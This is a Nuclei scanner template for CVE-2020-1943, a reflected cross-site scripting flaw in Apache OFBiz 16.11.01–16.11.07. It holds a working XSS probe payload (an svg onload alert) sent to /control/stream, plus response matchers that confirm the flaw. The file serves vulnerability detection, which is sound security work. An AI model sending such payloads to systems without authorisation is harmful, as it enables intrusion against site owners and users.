nuclei-templates/cves/2020/CVE-2020-1943.yaml

31 lines
795 B
YAML

id: CVE-2020-1943
info:
name: Apache OFBiz Reflected XSS
author: pdteam
description: Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07.
severity: medium
tags: cve,cve2020,apache,xss
reference:
- https://lists.apache.org/thread.html/rf867d9a25fa656b279b16e27b8ff6fcda689cfa4275a26655c685702%40%3Cdev.ofbiz.apache.org%3E
requests:
- method: GET
path:
- '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=alert(xss)>"
part: body
- type: word
words:
- "text/html"
part: header
- type: status
status:
- 200